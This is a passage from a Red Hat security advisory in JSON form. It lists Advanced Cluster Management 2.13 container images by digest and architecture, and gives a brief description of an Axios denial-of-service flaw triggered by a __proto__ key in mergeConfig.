"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
